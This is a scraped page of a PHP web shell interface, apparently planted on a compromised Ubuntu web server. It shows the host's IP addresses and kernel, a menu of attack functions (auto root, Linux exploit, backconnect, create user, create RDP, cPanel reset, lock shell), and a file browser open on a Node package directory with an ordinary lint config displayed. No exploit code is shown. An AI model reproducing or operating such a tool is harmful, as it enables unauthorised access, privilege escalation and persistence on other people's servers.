Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
node_modules /
es-to-primitive /
[ HOME SHELL ]
Name
Size
Permission
Action
.github
[ DIR ]
dr-xr-xr-x
helpers
[ DIR ]
dr-xr-xr-x
test
[ DIR ]
dr-xr-xr-x
.eslintrc
389
B
-rw-rw-rw-
.travis.yml
299
B
-rw-rw-rw-
CHANGELOG.md
2.06
KB
-rw-rw-rw-
LICENSE
1.06
KB
-rw-rw-rw-
Makefile
3.74
KB
-rw-rw-rw-
README.md
1.95
KB
-rw-rw-rw-
es2015.js
2.09
KB
-rw-rw-rw-
es5.js
1.17
KB
-rw-rw-rw-
es6.js
53
B
-rw-rw-rw-
index.js
454
B
-rw-rw-rw-
package.json
1.66
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .eslintrc
{ "root": true, "extends": "@ljharb", "rules": { "complexity": [2, 14], "func-name-matching": 0, "id-length": [2, { "min": 1, "max": 24, "properties": "never" }], "max-statements": [2, 20], "new-cap": [2, { "capIsNewExceptions": ["GetMethod"] }] }, "overrides": [ { "files": "test/**", "rules": { "max-lines-per-function": [2, { "max": 68 }], }, } ], }
Close